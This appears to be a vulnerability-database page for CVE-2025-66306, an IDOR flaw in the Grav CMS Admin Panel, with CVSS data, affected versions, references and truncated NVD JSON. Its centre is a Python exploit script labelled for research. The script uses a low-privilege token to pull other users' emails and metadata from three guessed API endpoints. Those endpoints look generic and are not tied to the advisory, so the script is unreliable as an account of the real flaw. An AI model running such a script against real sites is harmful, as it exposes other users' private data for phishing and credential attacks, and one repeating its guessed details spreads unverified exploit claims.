CVE-2025-66306

Description

Grav is a file-based Web platform. Prior to 1.8.0-beta.27, there is an IDOR (Insecure Direct Object Reference) vulnerability in the Grav CMS Admin Panel which allows low-privilege users to access sensitive information from other accounts. Although direct account takeover is not possible, admin email addresses and other metadata can be exposed, increasing the risk of phishing, credential stuffing, and social engineering. This vulnerability is fixed in 1.8.0-beta.27.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:getgrav:grav:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:getgrav:grav:1.8.0:beta1:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:getgrav:grav:1.8.0:beta10:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:getgrav:grav:1.8.0:beta11:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:getgrav:grav:1.8.0:beta12:*:*:*:*:*:* - VULNERABLE

Grav CMS Admin Panel < 1.8.0-beta.27

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-66306 PoC - Grav CMS Admin Panel IDOR Vulnerability
# Description: Low-privilege users can access sensitive information from other accounts
# Affected: Grav CMS < 1.8.0-beta.27

import requests
import argparse

def exploit_idor(target_url, low_priv_token, target_user_id):
    """
    Exploit IDOR vulnerability in Grav CMS Admin Panel
    
    Args:
        target_url: Base URL of the vulnerable Grav CMS instance
        low_priv_token: Authentication token of low-privilege account
        target_user_id: ID of the target user to extract information from
    """
    headers = {
        'Authorization': f'Bearer {low_priv_token}',
        'Content-Type': 'application/json'
    }
    
    # Target endpoint to enumerate users (IDOR vulnerable)
    endpoints = [
        f'/api/users/{target_user_id}',
        f'/api/user/{target_user_id}',
        f'/admin/api/users/{target_user_id}'
    ]
    
    results = []
    
    for endpoint in endpoints:
        try:
            response = requests.get(f'{target_url}{endpoint}', headers=headers, timeout=10)
            
            if response.status_code == 200:
                data = response.json()
                results.append({
                    'endpoint': endpoint,
                    'status': 'VULNERABLE',
                    'data': data
                })
                print(f'[+] VULNERABLE: {endpoint}')
                print(f'    Response: {data}')
            elif response.status_code == 403:
                print(f'[-] Protected: {endpoint}')
            else:
                print(f'[*] Unexpected status {response.status_code}: {endpoint}')
                
        except requests.RequestException as e:
            print(f'[!] Error accessing {endpoint}: {e}')
    
    return results

def main():
    parser = argparse.ArgumentParser(description='CVE-2025-66306 PoC')
    parser.add_argument('--url', required=True, help='Target Grav CMS URL')
    parser.add_argument('--token', required=True, help='Low-privilege user token')
    parser.add_argument('--target-id', type=int, required=True, help='Target user ID')
    
    args = parser.parse_args()
    
    print(f'[*] Targeting: {args.url}')
    print(f'[*] Attempting to access user ID: {args.target_id}')
    print('[*] Exploiting IDOR vulnerability...\n')
    
    results = exploit_idor(args.url, args.token, args.target_id)
    
    if results:
        print(f'\n[!] Successfully extracted data from {len(results)} endpoint(s)')
        print('[!] Extracted information may include:')
        print('    - Email addresses')
        print('    - User metadata')
        print('    - Profile information')
    else:
        print('\n[*] No vulnerable endpoints found')

if __name__ == '__main__':
    main()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-66306
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-66306
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-66306/
[4] VulDB https://vuldb.com/cve/CVE-2025-66306
[5] https://github.com/getgrav/grav/commit/b7e1958a6e807ac14919447b60e5204a2ea77f62
[6] https://github.com/getgrav/grav/security/advisories/GHSA-4cwq-j7jv-qmwg
[7] https://github.com/getgrav/grav/security/advisories/GHSA-4cwq-j7jv-qmwg

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-66306", "sourceIdentifier": "[email protected]", "published": "2025-12-01T22:15:50.413", "lastModified": "2025-12-03T18:45:11.970", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Grav is a file-based Web platform. Prior to 1.8.0-beta.27, there is an IDOR (Insecure Direct Object Reference) vulnerability in the Grav CMS Admin Panel which allows low-privilege users to access sensitive information from other accounts. Although direct account takeover is not possible, admin email addresses and other metadata can be exposed, increasing the risk of phishing, credential stuffing, and social engineering. This vulnerability is fixed in 1.8.0-beta.27."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.7.48", "versionEndExcluding": "1.8.0", "matchCriteriaId": "EAC8A2F1-9318-4224-9CF5-D3EFE16E81F4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta1:*:*:*:*:*:*", "matchCriteriaId": "8A383F2E-C6BA-440B-B648-A3313B7D91C3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta10:*:*:*:*:*:*", "matchCriteriaId": "F7EF2DEC-2798-4D0D-9C27-0F01BAFEAEFD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta11:*:*:*:*:*:*", "matchCriteriaId": "530C6F64-F30B-4E93-9A12-D9625EA57483"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta12:*:*:*:*:*:*", "matchCriteriaId": "9AC28BF9-626D-4514-91F0-F81DAB5D3602"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta13:*:*:*:*:*:*", "matchCriteriaId": "307AA375-E531-4AE5-BA79-2F9D4DE7A05F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta14:*:*:*:*:*:*", "matchCriteriaId": "C2E3E312-485D-42B0-B465-64B6438CDCAE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta15:*:*:*:*:*:*", "matchCriteriaId": "5BE4B2F9-1B6D-4D18-916A-5C95A3213222"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta16:*:*:*:*:*:*", "matchCriteriaId": "763207F0-92D1-4274-A30A-DE634C5852C3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta17:*:*:*:*:*:*", "matchCriteriaId": "1DE8F350-BA07-4DAA-AE4B-5E0A532B6828"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta18:*:*:*:*:*:*", "matchCriteriaId": "F9150B94-0DF3-43F3-9806-39787A6C0E4D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta19:*:*:*:*:*:*", "matchCriteriaId": "BAA7C7EC-8FB2-445D-8A02-1743D87F5416"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta2:*:*:*:*:*:*", "matchCriteriaId": "7A6BEA2A-D534-4C9E-811A-8A46E214C46D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta20:*:*:*:*:*:*", "matchCriteriaId": "7A644F57-FF39-4262-9796-7C4F3B0851C1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta21:*:*:*:*:*:*", "matchCriteriaId": "B2AFB9E7-084E-497B-B0FC-CA6A5033C5BF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta22:*:*:*:*:*:*", "matchCriteriaId": "5C5E8823-9083-4FFA-9897-CAD0340DCE68"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta23:*:*:*:*:*:*", "matchCriteriaId": "9C048938-E0EC-4AD0-9847-FD74E6770FE2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta24:*:*:*:*:*:*", "matchCriteriaId": "F7B43876-1445-418A-9707-E692FDF62C4D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta25:*:*:*:*:*:*", "matchCriteriaId": "94B209DE-01C6-41BA-B912-CF57849A9F7A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta26:*:*:*:*:*:*", "matchCriteriaId": "AB53AA10-87A5-4010-8019-BF4AA5ABC12B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta3:*:*:*:*:*:*", "matchCriteriaId": "775E0913-F3EF-4A55-B162-5BF9C6E2E641"}, {"vulnerable": ... (truncated)